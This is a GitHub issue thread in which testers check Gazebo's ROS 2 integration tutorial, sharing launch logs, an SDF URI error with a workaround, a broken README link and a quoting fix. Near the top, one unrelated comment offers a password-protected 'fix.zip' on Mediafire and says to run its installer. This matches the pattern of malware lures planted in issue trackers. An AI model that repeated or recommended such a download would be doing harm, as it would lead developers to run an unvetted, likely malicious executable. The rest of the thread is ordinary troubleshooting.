gazebosim/gazebo_test_cases #1071: docs: ros2_integration

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/ros2_integration)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/ros2_integration.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

EnzoGhisoni, 2024-08-30:
I am interested to test this

EnzoGhisoni, 2024-09-02:
I have the following issue with the last example:

$ ros2 launch ros_gz_sim_demos sdf_parser.launch.py rviz:=True
[INFO] [launch]: All log files can be found below /home/ubuntu/.ros/log/2024-09-02-11-34-10-475848-edbd1767fa8e-22805
[INFO] [launch]: Default logging verbosity is set to INFO
[INFO] [ruby $(which gz) sim-1]: process started with pid [22808]
[INFO] [parameter_bridge-2]: process started with pid [22809]
[INFO] [robot_state_publisher-3]: process started with pid [22810]
[INFO] [rviz2-4]: process started with pid [22811]
[rviz2-4] QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-ubuntu'
[parameter_bridge-2] [INFO] [1725269650.696916656] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/clock (gz.msgs.Clock) -> /clock (rosgraph_msgs/msg/Clock)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.698141969] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/world/demo/model/vehicle/joint_state (gz.msgs.Model) -> /world/demo/model/vehicle/joint_state (sensor_msgs/msg/JointState)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.700052148] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/pose (gz.msgs.Pose_V) -> /model/vehicle/pose (tf2_msgs/msg/TFMessage)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.701179539] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/pose_static (gz.msgs.Pose_V) -> /model/vehicle/pose_static (tf2_msgs/msg/TFMessage)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.701395772] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/cmd_vel (gz.msgs.Twist) -> /model/vehicle/cmd_vel (geometry_msgs/msg/Twist)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.701758798] [ros_gz_bridge]: Creating ROS->GZ Bridge: [/model/vehicle/cmd_vel (geometry_msgs/msg/Twist) -> /model/vehicle/cmd_vel (gz.msgs.Twist)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.702448563] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/odometry (gz.msgs.Odometry) -> /model/vehicle/odometry (nav_msgs/msg/Odometry)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725269650.703474896] [ros_gz_bridge]: Creating ROS->GZ Bridge: [/model/vehicle/odometry (nav_msgs/msg/Odometry) -> /model/vehicle/odometry (gz.msgs.Odometry)] (Lazy 0)
[robot_state_publisher-3] [WARN] [1725269650.715998781] [kdl_parser]: The root link chassis has an inertia specified in the URDF, but KDL does not support a root link with an inertia.  As a workaround, you can add an extra dummy link to your URDF.
[robot_state_publisher-3] [WARN] [1725269650.718103723] [kdl_parser]: Converting unknown joint type of joint 'caster_wheel' into a fixed joint
[robot_state_publisher-3] [INFO] [1725269650.718158736] [robot_state_publisher]: Robot initialized
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 14: [/sdf/world[@name="demo"]/model[@name="vehicle"]/include[0]/uri:/opt/ros/jazzy/share/ros_gz_sim_demos/worlds/vehicle.sdf:L64]: Msg: Unable to find uri[package://ros_gz_sim_demos/models/vehicle]
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 17: Msg: A model must have at least one link.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 17: Msg: A model must have at least one link.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 9: Msg: Failed to load a world.
[ruby $(which gz) sim-1] QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-ubuntu'
[INFO] [ruby $(which gz) sim-1]: process has finished cleanly [pid 22808]
[INFO] [launch]: process[ruby $(which gz) sim-1] was required: shutting down launched system
[INFO] [rviz2-4]: sending signal 'SIGINT' to process[rviz2-4]
[INFO] [robot_state_publisher-3]: sending signal 'SIGINT' to process[robot_state_publisher-3]
[INFO] [parameter_bridge-2]: sending signal 'SIGINT' to process[parameter_bridge-2]
[rviz2-4] [INFO] [1725269651.421196207] [rclcpp]: signal_handler(signum=2)
[robot_state_publisher-3] [INFO] [1725269651.421472362] [rclcpp]: signal_handler(signum=2)
[parameter_bridge-2] [INFO] [1725269651.421829026] [rclcpp]: signal_handler(signum=2)
[rviz2-4] [INFO] [1725269651.524005270] [rviz2]: Stereo is NOT SUPPORTED
[rviz2-4] [INFO] [1725269651.524039474] [rviz2]: OpenGl version: 4.6 (GLSL 4.6)
[INFO] [parameter_bridge-2]: process has finished cleanly [pid 22809]
[INFO] [robot_state_publisher-3]: process has finished cleanly [pid 22810]
[rviz2-4] [INFO] [1725269651.585078176] [rviz2]: Stereo is NOT SUPPORTED
[rviz2-4] terminate called after throwing an instance of 'rclcpp::exceptions::RCLError'
[rviz2-4]   what():  failed to create guard condition: the given context is not valid, either rcl_init() was not called or rcl_shutdown() was called., at ./src/rcl/guard_condition.c:67
[ERROR] [rviz2-4]: process has died [pid 22811, exit code -6, cmd '/opt/ros/jazzy/lib/rviz2/rviz2 -d /opt/ros/jazzy/share/ros_gz_sim_demos/rviz/vehicle.rviz --ros-args --params-file /tmp/launch_params_03qv9w57'].

j-rivero, 2024-09-02:
> Test setup: Docker provided in readme [gazebo_test_cases](https://github.com/gazebosim/gazebo_test_cases) with ros2 jazzy installed on the docker (debian install)
> 
> The first example is working without issues.

How did you install the `ros_gz` for Jazzy? The `ros-jazzy-ros-gz` package will install the Harmonic version (8.x.y) if used without any more configuration.

EnzoGhisoni, 2024-09-02:
I did the installation from apt. I tried from source but I had dependencies issues.
Okay maybe that's why i have this error. Should I try the example with rolling ? (if yes it could be interesting to indicate the right ROS version to follow the tutorial).

azeey, 2024-09-02:
@EnzoGhisoni the Readme has instructions for testing with ROS 2.

EnzoGhisoni, 2024-09-03:
You are right @azeey, I missed it
I will try it again that way.

EnzoGhisoni, 2024-09-03:
Hi I tried again with this configuration:
Docker provided for testing
ROS2 rolling installed form debian package
ros_gz build from source in a ros2_ws

I'm still able to start the first example.

I still have issue with the second example.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 14: [/sdf/world[@name="demo"]/model[@name="vehicle"]/include[0]/uri:/home/ubunutu/ros2_ws/install/ros_gz_sim_demos/share/ros_gz_sim_demos/worlds/vehicle.sdf:L64]: Msg: Unable to find uri[package://ros_gz_sim_demos/models/vehicle]
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 17: Msg: A model must have at least one link.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 17: Msg: A model must have at least one link.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 9: Msg: Failed to load a world.

I'm able to start: ros2 launch ros_gz_sim gz_sim.launch.py gz_args:="shapes.sdf" so I don't thi
[image]

And also the other examples from

utkuesen, 2024-09-06:
Hi, I tried it on Ubuntu PC without Docker.
First part is working. 
[image]

However, some changes may be implemented on Rviz part of the example.
I couldn't be done with the instructions. I followed the way:
1) I followed the some examples about [ros_gz_sim_demos](https://github.com/gazebosim/ros_gz/tree/ros2/ros_gz_sim_demos), they worked well.

2) Runned instaliation command for ros_gz.
 sudo apt-get install ros-jazzy-ros-gz

3) Created sdformat_urdf ros workspace and compiled it.
3.1)
mkdir ros_gz_ws
cd ros_gz_ws
mkdir src
cd src
git clone https://github.com/ros/sdformat_urdf.git
cd ..
colcon build

3.2) The link given for sdformat_urdf is broken.
File not found error in "Read more about sdformat_urdf [here](https://github.com/ros/sdformat_urdf/blob/ros2/sdformat_urdf/README.md)."

4) I tried to run the command "ros2 launch ros_gz_sim_demos sdf_parser.launch.py rviz:=True", then get this error:
$ ros2 launch ros_gz_sim_demos sdf_parser.launch.py rviz:=True
[INFO] [launch]: All log files can be found below /home/utku/.ros/log/2024-09-06-21-30-04-398082-utku-hp-38252
[INFO] [launch]: Default logging verbosity is set to INFO
[INFO] [ruby $(which gz) sim-1]: process started with pid [38255]
[INFO] [parameter_bridge-2]: process started with pid [38256]
[INFO] [robot_state_publisher-3]: process started with pid [38257]
[INFO] [rviz2-4]: process started with pid [38259]
[parameter_bridge-2] [INFO] [1725647405.134179003] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/clock (gz.msgs.Clock) -> /clock (rosgraph_msgs/msg/Clock)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.135918838] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/world/demo/model/vehicle/joint_state (gz.msgs.Model) -> /world/demo/model/vehicle/joint_state (sensor_msgs/msg/JointState)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.143099233] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/pose (gz.msgs.Pose_V) -> /model/vehicle/pose (tf2_msgs/msg/TFMessage)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.147218447] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/pose_static (gz.msgs.Pose_V) -> /model/vehicle/pose_static (tf2_msgs/msg/TFMessage)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.149541213] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/cmd_vel (gz.msgs.Twist) -> /model/vehicle/cmd_vel (geometry_msgs/msg/Twist)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.151087481] [ros_gz_bridge]: Creating ROS->GZ Bridge: [/model/vehicle/cmd_vel (geometry_msgs/msg/Twist) -> /model/vehicle/cmd_vel (gz.msgs.Twist)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.152052032] [ros_gz_bridge]: Creating GZ->ROS Bridge: [/model/vehicle/odometry (gz.msgs.Odometry) -> /model/vehicle/odometry (nav_msgs/msg/Odometry)] (Lazy 0)
[parameter_bridge-2] [INFO] [1725647405.155592622] [ros_gz_bridge]: Creating ROS->GZ Bridge: [/model/vehicle/odometry (nav_msgs/msg/Odometry) -> /model/vehicle/odometry (gz.msgs.Odometry)] (Lazy 0)
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 14: [/sdf/world[@name="demo"]/model[@name="vehicle"]/include[0]/uri:/opt/ros/jazzy/share/ros_gz_sim_demos/worlds/vehicle.sdf:L64]: Msg: Unable to find uri[package://ros_gz_sim_demos/models/vehicle]
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 17: Msg: A model must have at least one link.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 17: Msg: A model must have at least one link.
[ruby $(which gz) sim-1] [Err] [Server.cc:204] Error Code 9: Msg: Failed to load a world.
[robot_state_publisher-3] [WARN] [1725647405.237359800] [kdl_parser]: The root link chassis has an inertia specified in the URDF, but KDL does not support a root link with an inertia.  As a workaround, you can add an extra dummy link to your URDF.
[robot_state_publisher-3] [WARN] [1725647405.245393476] [kdl_parser]: Converting unknown joint type of joint 'caster_wheel' into a fixed joint
[robot_state_publisher-3] [INFO] [1725647405.245485650] [robot_state_publisher]: Robot initialized
[rviz2-4] [INFO] [1725647405.455633072] [rviz2]: Stereo is NOT SUPPORTED
[rviz2-4] [INFO] [1725647405.455714171] [rviz2]: OpenGl version: 4.6 (GLSL 4.6)
[rviz2-4] [INFO] [1725647405.487076739] [rviz2]: Stereo is NOT SUPPORTED
[INFO] [ruby $(which gz) sim-1]: process has finished cleanly [pid 38255]
[INFO] [launch]: process[ruby $(which gz) sim-1] was required: shutting down launched system
[INFO] [rviz2-4]: sending signal 'SIGINT' to process[rviz2-4]
[INFO] [robot_state_publisher-3]: sending signal 'SIGINT' to process[robot_state_publisher-3]
[INFO] [parameter_bridge-2]: sending signal 'SIGINT' to process[parameter_bridge-2]
[rviz2-4] [INFO] [1725647405.766950152] [rclcpp]: signal_handler(signum=2)
[robot_state_publisher-3] [INFO] [1725647405.767881974] [rclcpp]: signal_handler(signum=2)
[parameter_bridge-2] [INFO] [1725647405.769030165] [rclcpp]: signal_handler(signum=2)
[INFO] [parameter_bridge-2]: process has finished cleanly [pid 38256]
[INFO] [robot_state_publisher-3]: process has finished cleanly [pid 38257]
[INFO] [rviz2-4]: process has finished cleanly [pid 38259]

5) I solved problem with opening "vehicle.sdf" file at "/opt/ros/jazzy/share/ros_gz_sim_demos/worlds" and editing line 64 from "package://ros_gz_sim_demos/models/vehicle" to "/opt/ros/jazzy/share/ros_gz_sim_demos/models/vehicle". Then, run the command "ros2 launch ros_gz_sim_demos sdf_parser.launch.py rviz:=True" 
again. Finally, it worked :) 
**There is a problem about finding directory of package  "ros_gz_sim_demos" in sdf file.** 
[image]

6) I opened new terminal and run these commands 
$ gz topic -t "/model/vehicle/cmd_vel" -m gz.msgs.Twist -p "linear: {x: 1.0}, angular: {z: -0.1}"

**`There must be added " , double quotes,  character at the end of second command.`**
**$ ros2 topic pub /model/vehicle/cmd_vel geometry_msgs/msg/Twist "{linear: {x: 5.0, y: 0.0, z: 0.0}, angular: {x: 0.0, y: 0.0, z: -0.1}}"**

After 30 seconds, the robot started to move
[image]